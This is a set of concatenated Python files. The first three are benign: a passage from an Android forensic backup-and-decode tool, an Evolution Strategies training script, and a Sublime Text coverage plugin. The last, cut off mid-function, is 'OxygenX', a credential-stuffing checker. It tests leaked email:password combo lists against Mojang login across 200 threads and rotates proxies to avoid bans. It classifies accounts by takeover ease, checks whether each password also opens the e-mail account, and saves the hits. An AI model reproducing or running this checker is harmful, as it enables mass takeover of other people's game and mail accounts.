                        # remote_size = remote_size if remote_size else len(file_obj)
                        if len(file_obj) == remote_size:
                            with open(file_saveas, 'wb') as W:
                                W.write(file_obj)
                            self.DataStore.add(file_saveas, file_remote)
                            self.DOWNLOADS.append(file_name)
                            return True
                        time.sleep(0.25)
                        self.logger.debug(f'Trying again for {file_name} ({len(file_obj)} bytes)')
                else:
                    self.logger.warning(f'Failed getting file: {file_name}')
                    return False
    def do_backup(self, ALL=True, shared=False, backup_name='backup.ab'):
        """Run `adb backup` on a worker thread, reporting the growing file size
        until the backup completes; stores the result path in self.backup."""
        backup_file = os.path.join(self.work_dir, backup_name)
        cmd = [
            'backup',
            '-shared' if shared else '',
            '-all' if ALL else '',
            '-f',
            backup_file,
        ]
        com = threading.Thread(target=lambda: self.adb(cmd))
        com.start()
        if self.updater:
            messages.msg_do_backup()
        while com.is_alive():
            time.sleep(0.5)
            if os.path.exists(backup_file):
                _size = os.path.getsize(backup_file)
                self.update(f'Reading backup: {utils.human_bytes(_size)}', info=False)
        self.backup = backup_file
    def AndroidBackupToTar(self):
        """Convert the .ab Android backup into a plain tar archive."""
        self.update('Unpacking backup...')
        self.tarfile = self.tools.ab_to_tar(self.backup)
    def ExtractFromTar(self, targets=[]):
        """Extract the given target paths from self.tarfile into output_dir,
        recording each file in the DataStore and DOWNLOADS.
        NOTE(review): mutable default `targets=[]` is only read here, but is
        still an anti-pattern; `extract_form_tar` typo is the upstream API name."""
        self.update('Extracting from backup...')
        for fn in self.tools.extract_form_tar(
                self.tarfile,
                self.output_dir,
                targets=targets):
            self.DataStore.add(os.path.join(self.output_dir, fn), fn)
            self.DOWNLOADS.append(fn)
    def get_targets(self):
        # Cache the registry's known artefact paths as PurePath objects.
        self.targets = [*map(pathlib.PurePath, self.registry.get_posix_links())]
    def in_targets(self, target):
        """Return True if `target` matches any registered decoder artefact path."""
        if not self.targets:
            self.get_targets()
        target = pathlib.PureWindowsPath(target).as_posix()
        for f in self.targets:
            if f.match(target):
                return True
        return False
    @staticmethod
    def extract_form_dir(src_dir):
        # Yield every regular file beneath src_dir, recursively.
        src_dir_path = pathlib.Path(src_dir)
        for fobj in src_dir_path.rglob('**/*'):
            if fobj.is_file():
                yield fobj
    def ExtractFromDir(self):
        """Copy decoder-relevant files from self.src_dir into output_dir."""
        self.update('Extracting from directory...')
        src_dir_path = pathlib.Path(self.src_dir)
        for fobj in self.extract_form_dir(self.src_dir):
            fn = fobj.relative_to(src_dir_path)
            if self.in_targets(fn.name):
                self.logger.info(fn.name)
                shutil.copy2(fobj, os.path.join(self.output_dir, fn.name))
                self.DOWNLOADS.append(os.path.basename(fn))
    def enumerate_files(self, target_dir='/'):
        """List readable files under target_dir on the device.
        NOTE(review): FILES is built but never returned, and `self.adb_iter`
        is not defined in this class — looks unfinished; confirm upstream."""
        FILES = []
        for f in self.adb_iter(f'find {target_dir} -type f -readable'):
            FILES.append(f)
    def DataAcquisition(self, run_backup=False, shared=False):
        """Pull databases directly when rooted; otherwise fall back to
        `adb backup`. Flags a backup under 1 KiB as failed."""
        self.update('Acquiring data...')
        if not run_backup and self.ROOT in self.permisson:
            if shared:
                self.update('Acquiring shared storage...')
                self.do_backup(ALL=False, shared=True, backup_name='shared.ab')
            self.update('Acquiring databases via root...')
            for file_path in self.registry.get_root_links():
                self.download_file(file_path)
        elif run_backup or self.permisson == self.USER:
            self.do_backup(shared=shared)
        if self.backup and os.path.getsize(self.backup) <= 2 ** 10:
            self.logger.error('Android backup failed - too small.')
            self.backup = False
    def DataExtraction(self):
        """Unpack whichever source we have (backup -> tar) into output_dir."""
        self.update('Extracting data from source...')
        if self.backup:
            self.AndroidBackupToTar()
        if self.tarfile:
            targets = self.registry.get_all_links()
            # Perhaps change to posix links?
            self.ExtractFromTar(targets=targets)
        # if self.DataStore and self.DataStore.members:
        #     pass # TODO!
    def DecodeShared(self):
        """Decode the shared filesystem from the backup, if one was taken.
        NOTE(review): `self.backup or (self.do_shared and self.backup)` reduces
        to just `self.backup` — confirm the intended condition."""
        try:
            if self.backup or (self.do_shared and self.backup):
                self.update('Decoding shared filesystem...')
                deco = decoders.SharedFilesystemDecoder(self.work_dir, self.backup)
                self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
        except Exception as err:
            logger.exception(f'Shared decoder error: {err}')
    def DataDecoding(self):
        """Run every registered decoder over the downloaded artefacts,
        collecting HTML fragments and writing into the master workbook.
        Individual decoder failures are logged and skipped."""
        self.update('Decoding extracted data...')
        self.logger.debug(self.DOWNLOADS)
        workbook = self.get_master_workbook()
        for file_name in filter(None.__ne__, self.DOWNLOADS):
            if self.registry.has_target(file_name):
                for deco_class in self.registry.decoders_target(file_name):
                    file_path = os.path.join(self.output_dir, file_name)
                    try:
                        self.logger.info(f'Decoding {file_name} using {deco_class.__name__}')
                        deco = deco_class(self.work_dir, file_path)
                        if not deco.template_name:
                            continue
                        self.DECODED.append([deco.report_html(), f'{deco.title} ({len(deco.DATA)})'])
                        deco.report_xlsx(workbook=workbook)
                    except Exception as e:
                        logger.error(f'Decoding error for `{os.path.basename(file_name)}`: {e}')
                        logger.exception(str(e))
    def GenerateHtmlReport(self, open_html=True):
        """Render REPORT.html from the collected REPORT/DECODED data and
        optionally open it in the default browser."""
        self.update('Generating HTML report...')
        env = engines.get_engine()
        template_name = 'REPORT.html'
        template = env.get_template(template_name)
        report_file = os.path.join(self.work_dir, template_name)
        with open(report_file, 'w') as W:
            W.write(template.render(
                report=self.REPORT.items(),
                decoded=self.DECODED,
                **engines.get_head_foot()))
        if open_html:
            report_uri = pathlib.Path(report_file).as_uri()
            webbrowser.open_new_tab(report_uri)
    def get_master_workbook(self):
        """Create (and cache on self.WB) the master XLSX workbook with a
        Summary sheet; returns the workbook."""
        self.WB = engines.Workbook(self.work_dir, 'REPORT')
        self.summary_sheet = self.WB.add_sheet('Summary')
        self.WB.write_header(self.summary_sheet, ['Extraction Summary'])
        return self.WB
    def GenerateXlsxReport(self):
        """Write one summary row per decoded artefact and close the workbook."""
        self.update('Generating XLSX report...')
        for row, summary in enumerate(self.DECODED, start=1):
            self.summary_sheet.write_row(row, 0, summary[1:])
        self.WB.close()
# -----------------------------------------------------------------------------
class DecodingError(Exception):
    """Raised when a decoder fails to process an extracted artefact."""
    pass
|
ES_train.py | from __future__ import absolute_import, division, print_function
import os
from multiprocessing import Process
import math
import argparse
import logging
import numpy as np
import torch
import torch.nn.functional as F
import torch.multiprocessing as mp
from torch.autograd import Variable
from envs import create_env
from models.ES import ES
#logger
logger = logging.getLogger("universe-server")
logger.setLevel(logging.INFO)
def ES_train(env_name):
    """Train Evolution Strategies model in separate process not to block Flask"""
    worker = Process(target=train_model, args=(env_name, 1))
    worker.start()
def train_model(env_name, num_threads):
    """Train and save the model"""
    # NOTE(review): num_threads is currently unused — confirm whether it was
    # meant to drive the worker count.
    # set parameters as namespace object and give them values
    args = argparse.Namespace()
    args.env_name = env_name
    args.lr = 0.3 # learning rate
    args.lr_decay = 1 #learning rate decay
    args.sigma = 0.05 # noise standard deviation
    args.n = 40 # batch size (even number)
    args.max_episode_length = 10 # maximum length of an episode 100000
    args.max_gradient_updates = 10 # 100000
    args.restore = '' # restore checkpoint
    args.variable_ep_len = False # Change max episode length during training
    args.silent = False # Prints during training
    env = create_env(args.env_name, client_id="ES1", remotes=1) # Local docker container
    # Checkpoints go under a per-environment directory, created on demand.
    chkpt_dir = 'checkpoints/%s/' % args.env_name
    if not os.path.exists(chkpt_dir):
        os.makedirs(chkpt_dir)
    synced_model = ES(env.observation_space.shape[0], env.action_space)
    # ES does not use backpropagation; disable gradients on every parameter.
    for param in synced_model.parameters():
        param.requires_grad = False
    if args.restore:
        state_dict = torch.load(args.restore)
        synced_model.load_state_dict(state_dict)
    train_loop(args, synced_model, env, chkpt_dir)
def do_rollouts(args, models, random_seeds, return_queue, env, are_negative):
    """
    For each model, do a rollout and report the results.

    Each model runs for up to ``args.max_episode_length`` environment steps
    (or until the episode ends); the tuple
    (random_seeds, all_returns, all_num_frames, are_negative) is put on
    ``return_queue``.

    :param args: namespace providing at least ``max_episode_length``.
    :param models: policy networks, each called as model((state_batch, (hx, cx)))
        returning (logits, (hx, cx)).
    :param random_seeds: seeds associated with each model (passed through).
    :param return_queue: queue the result tuple is put on.
    :param env: gym-style environment with reset()/step().
    :param are_negative: antithetic-perturbation flags (passed through).
    """
    all_returns = []
    all_num_frames = []
    for model in models:
        # LSTM hidden/cell state, reset for each episode.
        cx = Variable(torch.zeros(1, 256))
        hx = Variable(torch.zeros(1, 256))
        state = env.reset()
        state = torch.from_numpy(state)
        this_model_return = 0
        this_model_num_frames = 0
        # Rollout
        for step in range(args.max_episode_length):
            # No backward pass exists in ES, so no grad bookkeeping is needed
            # (the removed `volatile=True` flag no longer exists in torch).
            logit, (hx, cx) = model(
                (Variable(state.unsqueeze(0)),
                 (hx, cx)))
            # Greedy action: index of the highest-probability logit.
            prob = F.softmax(logit, dim=1)
            action = prob.max(1)[1].data.numpy()
            # flatten()[0] works whether max() yields a 1-D or 2-D index tensor
            # (older `action[0, 0]` assumed the legacy 2-D shape; a stray bare
            # `logger.info()` call that raised TypeError was removed here).
            state, reward, done, _ = env.step(action.flatten()[0])
            this_model_return += reward
            this_model_num_frames += 1
            if done:
                break
            state = torch.from_numpy(state)
        all_returns.append(this_model_return)
        all_num_frames.append(this_model_num_frames)
    return_queue.put((random_seeds, all_returns, all_num_frames, are_negative))
def perturb_model(args, model, random_seed, env):
    """
    Build two copies of ``model`` whose parameters are shifted by Gaussian
    noise of scale ``args.sigma``: one by +noise and one by -noise
    (antithetic sampling). Seeding NumPy with ``random_seed`` makes the
    noise reproducible for the later gradient update.
    """
    positive = ES(env.observation_space.shape[0],
                  env.action_space)
    negative = ES(env.observation_space.shape[0],
                  env.action_space)
    positive.load_state_dict(model.state_dict())
    negative.load_state_dict(model.state_dict())
    np.random.seed(random_seed)
    for (_, v_pos), (_, v_neg) in zip(positive.es_params(),
                                      negative.es_params()):
        noise = np.random.normal(0, 1, v_pos.size())
        v_pos += torch.from_numpy(args.sigma * noise).float()
        v_neg += torch.from_numpy(args.sigma * -noise).float()
    return [positive, negative]
# Module-level training history; gradient_update() appends to these after
# every batch (kept around for later inspection/plotting).
optimConfig = []
averageReward = []
maxReward = []
minReward = []
episodeCounter = []
def gradient_update(args, synced_model, returns, random_seeds, neg_list,
                    num_eps, num_frames, chkpt_dir, unperturbed_results):
    """Apply one ES gradient step to synced_model in place.

    Regenerates each perturbation's noise from its recorded seed, weights it
    by the rank-shaped return, prints batch statistics, appends to the
    module-level history lists, decays the learning rate, and checkpoints
    to chkpt_dir/latest.pth. Returns the updated model.
    """
    def fitness_shaping(returns):
        """
        A rank transformation on the rewards, which reduces the chances
        of falling into local optima early in training.
        """
        # NOTE(review): list.index() maps duplicate returns to the same rank.
        sorted_returns_backwards = sorted(returns)[::-1]
        lamb = len(returns)
        shaped_returns = []
        denom = sum([max(0, math.log(lamb/2 + 1, 2) -
                         math.log(sorted_returns_backwards.index(r) + 1, 2))
                     for r in returns])
        for r in returns:
            num = max(0, math.log(lamb/2 + 1, 2) -
                      math.log(sorted_returns_backwards.index(r) + 1, 2))
            shaped_returns.append(num/denom + 1/lamb)
        return shaped_returns
    def unperturbed_rank(returns, unperturbed_results):
        # Rank of the unperturbed model among the perturbed returns;
        # 1 means every perturbation scored at or below it.
        nth_place = 1
        for r in returns:
            if r > unperturbed_results:
                nth_place += 1
        rank_diag = ('%d out of %d (1 means gradient '
                     'is uninformative)' % (nth_place,
                                            len(returns) + 1))
        return rank_diag, nth_place
    batch_size = len(returns)
    assert batch_size == args.n
    assert len(random_seeds) == batch_size
    shaped_returns = fitness_shaping(returns)
    rank_diag, rank = unperturbed_rank(returns, unperturbed_results)
    print('Episode num: %d\n'
          'Average reward: %f\n'
          'Variance in rewards: %f\n'
          'Max reward: %f\n'
          'Min reward: %f\n'
          'Batch size: %d\n'
          'Max episode length: %d\n'
          'Sigma: %f\n'
          'Learning rate: %f\n'
          'Total num frames seen: %d\n'
          'Unperturbed reward: %f\n'
          'Unperturbed rank: %s\n\n' %
          (num_eps, np.mean(returns), np.var(returns), max(returns),
           min(returns), batch_size,
           args.max_episode_length, args.sigma, args.lr, num_frames,
           unperturbed_results, rank_diag))
    # Record batch statistics in the module-level history lists.
    averageReward.append(np.mean(returns))
    episodeCounter.append(num_eps)
    maxReward.append(max(returns))
    minReward.append(min(returns))
    # For each model, generate the same random numbers as we did
    # before, and update parameters. We apply weight decay once.
    for i in range(args.n):
        # Re-seeding reproduces exactly the noise used in perturb_model.
        np.random.seed(random_seeds[i])
        multiplier = -1 if neg_list[i] else 1
        reward = shaped_returns[i]
        for k, v in synced_model.es_params():
            eps = np.random.normal(0, 1, v.size())
            v += torch.from_numpy(args.lr/(args.n*args.sigma) *
                                  (reward*multiplier*eps)).float()
    args.lr *= args.lr_decay
    torch.save(synced_model.state_dict(),
               os.path.join(chkpt_dir, 'latest.pth'))
    return synced_model
def generate_seeds_and_models(args, synced_model, env):
    """Sample a fresh random seed and build its antithetic model pair.

    Reseeds numpy from OS entropy first so concurrent callers diverge,
    then returns (seed, two perturbed models sharing that seed).
    """
    np.random.seed()
    seed = np.random.randint(2**30)
    model_pair = perturb_model(args, synced_model, seed, env)
    return seed, model_pair
def train_loop(args, synced_model, env, chkpt_dir):
    """Main evolution-strategies training loop.

    Each iteration perturbs `synced_model` antithetically, evaluates all
    perturbations (plus the unperturbed model) in worker processes, and
    applies the resulting gradient update via gradient_update().
    """
    def flatten(raw_results, index):
        # Each worker returns per-field lists; pick field `index` from every
        # worker result and concatenate into one flat list.
        notflat_results = [result[index] for result in raw_results]
        return [item for sublist in notflat_results for item in sublist]
    logger.info("Num params in network %d" % synced_model.count_parameters())
    num_eps = 0
    total_num_frames = 0
    for _ in range(args.max_gradient_updates):
        processes = []
        return_queue = mp.Queue()
        all_seeds, all_models = [], []
        # Generate a perturbation and its antithesis
        for j in range(int(args.n/2)):
            random_seed, two_models = generate_seeds_and_models(args,
                                                                synced_model,
                                                                env)
            # Add twice because we get two models with the same seed
            all_seeds.append(random_seed)
            all_seeds.append(random_seed)
            all_models += two_models
        assert len(all_seeds) == len(all_models)
        # Keep track of which perturbations were positive and negative
        # Start with negative true because pop() makes us go backwards
        is_negative = True
        # Add all peturbed models to the queue
        while all_models:
            perturbed_model = all_models.pop()
            seed = all_seeds.pop()
            p = mp.Process(target=do_rollouts, args=(args,
                                                     [perturbed_model],
                                                     [seed],
                                                     return_queue,
                                                     env,
                                                     [is_negative]))
            p.start()
            processes.append(p)
            is_negative = not is_negative
        assert len(all_seeds) == 0
        # Evaluate the unperturbed model as well; the sentinel seed/neg
        # values let us find its result in the flattened lists below.
        p = mp.Process(target=do_rollouts, args=(args, [synced_model],
                                                 ['dummy_seed'],
                                                 return_queue, env,
                                                 ['dummy_neg']))
        p.start()
        processes.append(p)
        for p in processes:
            p.join()
        # One queue entry per process; reading after join() is safe here
        # because each worker pushed exactly one result.
        raw_results = [return_queue.get() for p in processes]
        seeds, results, num_frames, neg_list = [flatten(raw_results, index)
                                                for index in [0, 1, 2, 3]]
        # Separate the unperturbed results from the perturbed results
        _ = unperturbed_index = seeds.index('dummy_seed')
        seeds.pop(unperturbed_index)
        unperturbed_results = results.pop(unperturbed_index)
        _ = num_frames.pop(unperturbed_index)
        _ = neg_list.pop(unperturbed_index)
        total_num_frames += sum(num_frames)
        num_eps += len(results)
        synced_model = gradient_update(args, synced_model, results, seeds,
                                       neg_list, num_eps, total_num_frames,
                                       chkpt_dir, unperturbed_results)
        if args.variable_ep_len:
            # Adapt the episode cap to ~2x the mean episode length just seen.
            args.max_episode_length = int(2*sum(num_frames)/len(num_frames))
|
PyCover.py | from __future__ import print_function
import os
import sublime
import sublime_plugin
import subprocess
import sys
import time
import threading
SETTINGS = None
def plugin_loaded():
    """Load PyCover's settings once the Sublime plugin host is ready."""
    global SETTINGS
    SETTINGS = sublime.load_settings('PyCover.sublime-settings')
    if bool(SETTINGS) and SETTINGS.get('python') is not None:
        print('Loaded settings for PyCover')
        return
    print('Error loading settings for PyCover')
# Sublime Text 2 (Python 2 host) never calls plugin_loaded() itself,
# so schedule it manually on import.
if sys.version_info[0] == 2:
    sublime.set_timeout(plugin_loaded, 0)
class SublimePythonCoverageListener(sublime_plugin.EventListener):
    """Event listener to highlight uncovered lines when a Python file loads."""

    def on_load(self, view):
        # Guard against SETTINGS still being None: a view can load before
        # plugin_loaded() has run (it is deferred via set_timeout on ST2),
        # and SETTINGS.get would raise AttributeError then.
        if SETTINGS is None:
            return
        if SETTINGS.get('onload', False) and 'source.python' in view.scope_name(0):
            view.run_command('show_python_coverage')
class ShowPythonCoverageCommand(sublime_plugin.TextCommand):
    """Highlight uncovered lines in the current file
    based on a previous coverage run."""

    def is_visible(self):
        # Hide the command entirely for non-Python files.
        return self.is_enabled()

    def is_enabled(self):
        return 'source.python' in self.view.scope_name(0)

    def run(self, edit):
        """Toggle coverage highlights for the current file."""
        fname = self.view.file_name()
        if not self.is_enabled() or not fname:
            return
        local_settings = self.view.settings()
        if local_settings.get('showing', False):
            self.view.erase_regions('PyCover')
            local_settings.set('showing', False)
            return  # Toggle off
        # Walk up from the file looking for the coverage data file.
        cov_file = find(fname, '.coverage')
        if not cov_file:
            status_report('Could not find .coverage file for %s' % fname, wrap=True)
            return
        cov_config = find(fname, '.coveragerc') or ''
        # run missing_lines.py with the correct paths
        python = SETTINGS.get('python', '')
        if not python:
            python = which('python')
        ml_file = os.path.join(sublime.packages_path(), 'PyCover', 'scripts',
                               'missing_lines.py')
        # Parse coverage in a subprocess; a worker thread collects the output
        # so the UI thread is never blocked.
        p = subprocess.Popen([python, ml_file, cov_file, cov_config, fname],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        threading.Thread(target=missing_lines_callback, args=(self.view, p)).start()
def missing_lines_callback(view, proc, poll_sleep=0.1, poll_timeout=10):
    """Wait for the missing_lines.py subprocess and hand its output to the UI.

    Runs on a worker thread; every Sublime API call is marshalled onto the
    main thread via sublime.set_timeout. Kills the subprocess after
    `poll_timeout` seconds.
    """
    progress_status = lambda: sublime.status_message('Finding missing lines...')
    sublime.set_timeout(progress_status, 0)
    # poll for results
    tic = time.time()
    while proc.poll() is None:
        if time.time() - tic > poll_timeout:
            msg = 'missing_lines.py timed out after %f s' % (time.time() - tic)
            status_report(msg, wrap=True)
            proc.kill()
            return
        time.sleep(poll_sleep)
        # Re-post the status message so it stays visible while waiting.
        sublime.set_timeout(progress_status, 0)
    stdout, stderr = proc.communicate()
    if proc.returncode != 0:
        status_report(stderr.decode('UTF-8'), wrap=True)
        return
    # read stdout to parse missing lines (one 1-based line number per line)
    missing_lines = map(int, stdout.decode('UTF-8').splitlines())
    # update highlighted regions
    sublime.set_timeout(lambda: _update_highlighted(view, missing_lines), 0)
def _update_highlighted(view, missing_lines):
    """Outline the given 1-based line numbers in the view (main thread only)."""
    regions = []
    for lineno in missing_lines:
        point = view.text_point(lineno - 1, 0)
        regions.append(view.full_line(point))
    view.erase_regions('PyCover')
    if regions:
        view.add_regions('PyCover', regions, 'markup.inserted',
                         'Packages/PyCover/themes/default/bar.png', sublime.HIDDEN)
        view.settings().set('showing', True)
    status_report('%d missing lines annotated.' % len(regions))
def find(base, *rel, **kwargs):
    """Walk up from `base` looking for the relative path built from `rel`.

    Returns the first candidate that passes os.access with the given
    `access` mode (default os.R_OK), or None once the root is reached.
    """
    access = kwargs.get('access', os.R_OK)
    target = os.path.join(*rel)
    current = base
    while True:
        candidate = os.path.join(current, target)
        if os.access(candidate, access):
            return candidate
        parent = os.path.dirname(current)
        if not parent or parent == current:
            return None
        current = parent
def which(progname):
    """Search PATH for `progname`, trying each PATHEXT suffix (Windows).

    On POSIX, PATHEXT is normally unset so the bare name is tried.
    Returns the first existing candidate path, else None.
    """
    suffixes = os.environ.get('PATHEXT', '').split(os.pathsep)
    for directory in os.environ['PATH'].split(os.pathsep):
        candidates = (os.path.join(directory, progname + suffix)
                      for suffix in suffixes)
        for candidate in candidates:
            if os.path.exists(candidate):
                return candidate
    return None
def status_report(message, wrap=False):
    """Print `message` to the console and mirror it in the status bar.

    With wrap=True the status update is marshalled onto the main thread
    via set_timeout (needed when called from worker threads).
    """
    print('PyCover:', message)
    if not wrap:
        sublime.status_message(message)
    else:
        sublime.set_timeout(lambda: sublime.status_message(message), 0)
|
main.py | from concurrent.futures import ThreadPoolExecutor
from datetime import datetime, timedelta, timezone
from multiprocessing.dummy import Pool as ThreadPool
from os import mkdir, path, system, name
from random import choice
from re import compile
from threading import Thread, Lock
from time import sleep, strftime, time, gmtime
from traceback import format_exc
from cloudscraper import create_scraper
from colorama import init, Fore
from console.utils import set_title
from easygui import fileopenbox
from requests import Session, exceptions
from yaml import safe_load
version = 'CN1.0'
default_values = f'''# ________ ____ ___
# \_____ \ ___ ______.__. ____ ____ ____ \ \/ /
# / | \\\ \/ < | |/ ___\_/ __ \ / \ \ /
# / | \> < \___ / /_/ > ___/| | \/ \\
# \_______ /__/\_ \/ ____\___ / \___ >___| /___/\ \\
# \/ \/\/ /_____/ \/ \/ \_/
#
# -Created and coded by earthno1
# -Code cleaned and revised by MohanadHosny#9152
# -Settings file for OxygenX4CN-{version}
OxygenX:
# This option is for Chinese. It let every Chinese don' t need VPN to check LiquidBounce.
# Default True Because I Love China
# I love China !!!
china_network_support: true
# Check if current version of OxygenX is latest
check_for_updates: true
# Amount of checks for a account many times to check a account. will be slower if retries is set higher
# Needs to be 1 or higher (Recommanded: 1-2 for paid proxies, 3-6 for public proxies.)
retries: 3
# Higher for better accuracy but slower (counted in milliseconds, example: 6000ms = 6 seconds)
timeout: 6000
# Threads for account checking
threads: 200
# Remove all duplicates in combolist
combo_duplicates: true
# Remove all duplicates in proxylist/api
proxy_duplicates: true
# Check hits if its a mail access
mail_access: true
# Save ranked accounts in NFA.txt or SFA.txt (Turn it off for ranked accounts NOT to save in NFA.txt or SFA.txt)
save_ranked_type: true
# Print bad accounts
print_bad: true
# Save bad accounts
save_bad: true
# Normal users should keep this false unless problem start happening
debugging: false
capes:
# Check capes
liquidbounce: true
optifine: true
labymod: true
mojang: true
rank:
# Set true if you want to check the ranks/level
mineplex: true
hypixel: true
hivemc: true
veltpvp: true
level:
# Save High leveled accounts in files.
hypixel: true
mineplex: true
# Minimum high level accounts
hypixel_level: 25
mineplex_level: 25
proxy:
# If proxies should be used, Will be proxyless if set to false (Recommended to use VPN if this is set to false.)
proxy: true
# Proxy types: https | socks4 | socks5
proxy_type: 'socks4'
# EXPERMENTAL! Still in testing stage, may have problems
# Locks the proxy so other threads can't use it
lock_proxy: false
# EXPERMENTAL! Still in testing stage, may have problems
# Auto remove proxies (you can limit the proxies removed with proxy_remove_limit)
remove_bad_proxy: false
# EXPERMENTAL! Still in testing stage, may have problems
# If remove bad proxies are on, once the proxy list hits the limit it will stop removing bad proxies
proxy_remove_limit: 2000
# If proxies be used for checking sfas (Will be slower but if false, you may get ip banned)
proxy_for_sfa: false
# Sleep between checks if proxy mode is false (put 0 for no sleep) counted in secouds
sleep_proxyless: 30
api:
# If proxy api link to be used.
use: false
# If proxy_use_api is true, put api link in the parentheses
api_link: "https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=3000"
# If proxy_use_api is true, put a number for seconds to refresh the link (every number under 30 is for no refreshing time, recommend refresh time: 300 seconds aka 5 minutes)
refresh_time: 300
'''
# Create Settings.yml with the bundled defaults on first run, then load it.
# Context managers close the handles (the original leaked them and opened
# the file twice on the first-run path).
if not path.exists('Settings.yml'):
    with open('Settings.yml', 'w') as fh:
        fh.write(default_values)
with open('Settings.yml', 'r', errors='ignore') as fh:
    settings = safe_load(fh)
class Counter:
    """Process-wide tallies shared by all checker threads (class attributes)."""
    nfa = 0              # hits where secure_check() found security questions
    error = 0
    sfa = 0              # hits with an empty security-challenge list
    unfa = 0             # unmigrated (legacy) hits
    demo = 0             # valid logins with no game profile
    hits = 0
    bad = 0
    optifine = 0         # cape counters
    mojang = 0
    labymod = 0
    liquidbounce = 0
    special_name = 0     # usernames <= 3 chars or containing special chars
    hivemcrank = 0       # rank / high-level counters per server
    mineplexrank = 0
    mineplexhl = 0
    hypixelrank = 0
    hypixelhl = 0
    hivelevel = 0
    mfa = 0              # combos whose e-mail password also works
    nohypixel = 0
    nomineplex = 0
    veltrank = 0
    checked = 0
    cpm = 0              # checks-per-minute (updated by the cpm_counter thread)
    legacy_name = 0
    bad_retries = []     # hash(line) appended per retry, caps retries per combo
class Main:
def __init__(self):
    """Interactive entry point: choose mode, load inputs, start checking."""
    self.stop_time = True        # loop flag read by title/rproxies threads
    self.announcement = ''
    self.start_time = 0
    self.accounts = []
    self.proxylist = []
    self.folder = ''
    self.unmigrated = False
    if OxygenX.Cape.lb:
        # Fetch the LiquidBounce cape registry once up front.
        self.lbcape = str(self.liquidbounce())
    print(t)
    print(f'{red}[!] Please remember to configure your settings file before using OxygenX\n')
    print(f'{cyan}[Mode] Choose checker mode\n'
          '[>] 1 for Normal Mode\n'
          '[>] 2 for Unmigrated Mode')
    mode = input('> ')
    if mode == '2':
        self.unmigrated = True
    else:
        pass
    # NOTE(review): this prints even when Unmigrated Mode was chosen; it
    # probably belongs inside the else branch — confirm intent.
    print('\nSelected Normal Mode')
    self.loadcombo()
    self.loadproxy()
    self.resultfolder()
    print(f'\n{cyan}Starting Threads...')
    Thread(target=self.cpm_counter, daemon=True).start()
    self.start_checker()
    print(f'[{red}Exit{white}] You can now close OxygenX...\n')
    input()
    exit()
def prep(self, line):
    """Check one 'email:password' combo end to end.

    Validates the line, authenticates it, classifies the result
    (Bad/Demo/Unmigrated/SFA/NFA), runs all rank/cape/mail sub-checks in
    a small thread pool, and writes every matching result file.
    Called from the worker thread pool; retries recurse into prep().
    """
    if ':' in line:
        try:
            email, password = line.split(':', 1)
            original_line = line
            original_email = email
            if self.unmigrated:
                # Unmigrated mode logs in with the bare username part.
                if '@' in email:
                    email = email.split('@')[0]
                if not any(x in email for x in charz):
                    line = f'{email}:{password}'
                else:
                    # Name contains characters invalid for a legacy username.
                    Counter.checked += 1
                    Counter.bad += 1
                    self.prints(f'{red}[Badline] {blue}- {red}{line}')
                    self.writing([line, 'Badline'])
                    return
                reply = self.checkname(email)
                if not reply:
                    # Not a legacy name: retry (bounded) or count as bad.
                    if OxygenX.retries > 1 and Counter.bad_retries.count(hash(line)) < OxygenX.retries:
                        Counter.bad_retries.append(hash(line))
                        self.prints(f'{yellow}[Retry] {blue}- {yellow}{line}')
                        return self.prep(line)
                    else:
                        Counter.checked += 1
                        Counter.bad += 1
                        if OxygenX.print_bad:
                            self.prints(f'{red}[Bad] {blue}- {red}{line}')
                        if OxygenX.save_bad:
                            self.writing([line, 'Bad'])
                        return
                else:
                    Counter.legacy_name += 1
            else:
                pass
            # checkmc returns a requests Response on success, or the string
            # 'Invalid credentials' once retries are exhausted.
            answer = self.checkmc(user=email, passw=password)
            Counter.checked += 1
            if 'Invalid credentials' in answer:
                if OxygenX.retries > 1 and Counter.bad_retries.count(hash(line)) < OxygenX.retries:
                    Counter.bad_retries.append(hash(line))
                    self.prints(f'{yellow}[Retry] {blue}- {yellow}{line}')
                    return self.prep(line)
                else:
                    Counter.bad += 1
                    if OxygenX.print_bad:
                        self.prints(f'{red}[Bad] {blue}- {red}{line}')
                    if OxygenX.save_bad:
                        self.writing([line, 'Bad'])
                    return
            texta = answer.text
            if '[]' in texta:
                # Valid login but empty profile list: demo account.
                self.prints(f'{yellow}[Demo] {blue}- {yellow}{line}')
                Counter.demo += 1
                self.writing([line, 'Demo'])
                return
            else:
                ajson = answer.json()
                uuid = ajson['availableProfiles'][0]["id"]
                username = ajson['availableProfiles'][0]['name']
                self.writing([line, 'Hits'])
                token = ajson['accessToken']
                dosfa = True       # whether the SFA check should run
                sfa = False
                saveranked = True  # cleared when save_ranked_type is off and ranked
                if self.unmigrated:
                    data = ['=======================================\n'
                            f'Original Combo: {original_line}\n'
                            f'Unmigrated Combo: {line}\n'
                            f'Username: {username}\n'
                            f'UUID: {uuid}\n'
                            f'Email?: {original_email}\n'
                            f'Password: {password}']
                else:
                    data = ['=======================================\n'
                            f'Original Combo: {line}\n'
                            f'Username: {username}\n'
                            f'UUID: {uuid}\n'
                            f'Email: {email}\n'
                            f'Password: {password}']
                # NOTE(review): the second clause is subsumed by the first —
                # both test the same substring; confirm intended condition.
                if "legacy': True" in str(ajson) or (
                        self.unmigrated and "legacy': True" in str(ajson)):
                    Counter.unfa += 1
                    self.prints(f'{magenta}[Unmigrated]{blue} - {green}{line}')
                    self.writing([line, 'Unmigrated'])
                    data.append('\nUnmigrated: True')
                    dosfa = False
                if dosfa or not self.unmigrated:
                    securec = self.secure_check(token=token)
                    if securec:
                        Counter.sfa += 1
                        self.prints(f'{cyan}[SFA]{blue} - {green}{line}{blue} | {green}Username: {username}')
                        sfa = True
                        data.append('\nSFA: True')
                    else:
                        Counter.nfa += 1
                        self.prints(f'{green}[NFA]{blue} - {green}{line}{blue} | {green}Username: {username}')
                Counter.hits += 1
                if len(username) <= 3 or any(x in username for x in charz):
                    Counter.special_name += 1
                    self.writing([f'{line} | Username: {username}', 'SpecialName'])
                    data.append('\nSpecial Name: True')
                # Run the per-server checks concurrently; .result() blocks,
                # so results are collected in submission order.
                with ThreadPoolExecutor(max_workers=9) as exe:
                    hypixel = exe.submit(self.hypixel, uuid, line).result()
                    mineplex = exe.submit(self.mineplex, username, line).result()
                    hiverank = exe.submit(self.hivemc, uuid, line).result()
                    mailaccess = exe.submit(self.mailaccess, original_line).result()
